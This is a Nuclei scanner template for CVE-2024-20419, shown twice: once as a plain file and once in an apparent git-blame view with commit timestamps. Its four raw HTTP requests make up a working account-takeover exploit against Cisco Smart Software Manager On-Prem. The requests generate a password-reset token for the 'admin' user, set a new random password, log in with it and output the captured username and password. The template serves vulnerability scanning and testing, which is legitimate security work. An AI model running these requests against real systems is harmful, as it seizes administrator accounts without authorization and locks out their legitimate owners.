nuclei-templates/http/cves/2024/CVE-2024-20419.yaml

id: CVE-2024-20419

info:
  name: Cisco SSM On-Prem <= 8-202206 - Password Reset Account Takeover
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    A vulnerability in the authentication system of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated, remote attacker to change the password of any user, including administrative users. This vulnerability is due to improper implementation of the password-change process.
  impact: |
    An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow an attacker to access the web UI or API with the privileges of the compromised user.
  reference:
    - https://www.0xpolar.com/blog/CVE-2024-20419
    - https://nvd.nist.gov/vuln/detail/CVE-2024-20419
    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy
    - https://www.secpod.com/blog/critical-flaw-in-ciscos-secure-email-gateways-allows-attackers-to-control-the-device-completely/
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-20419
    cwe-id: CWE-620
    epss-score: 0.00043
    epss-percentile: 0.09568
  metadata:
    fofa-query: title="On-Prem License Workspace"
    verified: true
    max-request: 4
  tags: cve,cve2024,cisco,on-prem,ssm,intrusive,account-takeover

flow: http(1) && http(2) && http(3) && http(4)

variables:
  username: "admin"
  string1: "{{to_upper(rand_text_alphanumeric(7))}}"
  string2: "{{to_lower(rand_text_alphanumeric(7))}}"
  password: "{{string1}}{{string2}}!"

http:
  - raw:
      - |
        GET /backend/settings/oauth_adfs?hostname=polar HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - 'enabled'
          - 'redirect'
        condition: and
        internal: true

  - raw:
      - |
        POST /backend/reset_password/generate_code HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}

        {"uid": "admin"}

    matchers:
      - type: word
        words:
          - 'uid'
          - 'auth_token'
        condition: and
        internal: true

    extractors:
      - type: json
        part: body
        name: auth_token
        json:
          - ".auth_token"
        internal: true

  - raw:
      - |
        POST /backend/reset_password HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        X-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}

        {"uid": "admin","auth_token":"{{auth_token}}", "password":"{{password}}","password_confirmation":"{{password}}","common_name":""}

    matchers:
      - type: word
        words:
          - '"status":"OK"'
        condition: and
        internal: true

  - raw:
      - |
        POST /backend/auth/identity/callback HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    matchers:
      - type: word
        part: body
        words:
          - 'session_key'
          - 'role'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"USER: "+ username'
          - '"PASS: "+ password'

# digest: 4a0a0047304502201ec42847ae27bb505ed4771e1087ede881583983b128444a5c757840ea893571022100e8ae276dc91bd7d98e2f9749ab5ecec5e7dc1117251c20af8f149bfa5284bb72:922c64590222798bb761d5b6d8e72950
Create CVE-2024-20419.yaml 2024-09-04 13:12:21 +00:00			`id: CVE-2024-20419`

			`info:`
			`name: Cisco SSM On-Prem <= 8-202206 - Password Reset Account Takeover`
			`author: iamnoooob,rootxharsh,pdresearch`
			`severity: critical`
			`description: \|`
			`A vulnerability in the authentication system of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated, remote attacker to change the password of any user, including administrative users. This vulnerability is due to improper implementation of the password-change process.`
			`impact: \|`
			`An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow an attacker to access the web UI or API with the privileges of the compromised user.`
			`reference:`
			`- https://www.0xpolar.com/blog/CVE-2024-20419`
			`- https://nvd.nist.gov/vuln/detail/CVE-2024-20419`
			`- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy`
			`- https://www.secpod.com/blog/critical-flaw-in-ciscos-secure-email-gateways-allows-attackers-to-control-the-device-completely/`
			`- https://github.com/fkie-cad/nvd-json-data-feeds`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
			`cvss-score: 10`
			`cve-id: CVE-2024-20419`
			`cwe-id: CWE-620`
			`epss-score: 0.00043`
			`epss-percentile: 0.09568`
			`metadata:`
			`fofa-query: title="On-Prem License Workspace"`
			`verified: true`
			`max-request: 4`
			`tags: cve,cve2024,cisco,on-prem,ssm,intrusive,account-takeover`

			`flow: http(1) && http(2) && http(3) && http(4)`

			`variables:`
			`username: "admin"`
			`string1: "{{to_upper(rand_text_alphanumeric(7))}}"`
			`string2: "{{to_lower(rand_text_alphanumeric(7))}}"`
			`password: "{{string1}}{{string2}}!"`

			`http:`
			`- raw:`
			`- \|`
			`GET /backend/settings/oauth_adfs?hostname=polar HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers:`
			`- type: word`
			`words:`
			`- 'enabled'`
			`- 'redirect'`
			`condition: and`
			`internal: true`

			`- raw:`
			`- \|`
			`POST /backend/reset_password/generate_code HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/json`
			`X-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}`

			`{"uid": "admin"}`

			`matchers:`
			`- type: word`
			`words:`
			`- 'uid'`
			`- 'auth_token'`
			`condition: and`
			`internal: true`

			`extractors:`
fix lint error 2024-09-04 14:15:13 +00:00			`- type: json`
			`part: body`
			`name: auth_token`
			`json:`
			`- ".auth_token"`
			`internal: true`
Create CVE-2024-20419.yaml 2024-09-04 13:12:21 +00:00
			`- raw:`
			`- \|`
			`POST /backend/reset_password HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: application/json`
			`Content-Type: application/json`
			`X-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}`

			`{"uid": "admin","auth_token":"{{auth_token}}", "password":"{{password}}","password_confirmation":"{{password}}","common_name":""}`

			`matchers:`
			`- type: word`
			`words:`
			`- '"status":"OK"'`
			`condition: and`
			`internal: true`

			`- raw:`
			`- \|`
			`POST /backend/auth/identity/callback HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: application/json`
			`X-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}`
			`Content-Type: application/json`

			`{"username":"{{username}}","password":"{{password}}"}`

			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- 'session_key'`
			`- 'role'`
			`condition: and`

			`extractors:`
			`- type: dsl`
			`dsl:`
			`- '"USER: "+ username'`
			`- '"PASS: "+ password'`
chore: sign templates 🤖 2024-09-04 15:35:24 +00:00
			`# digest: 4a0a0047304502201ec42847ae27bb505ed4771e1087ede881583983b128444a5c757840ea893571022100e8ae276dc91bd7d98e2f9749ab5ecec5e7dc1117251c20af8f149bfa5284bb72:922c64590222798bb761d5b6d8e72950`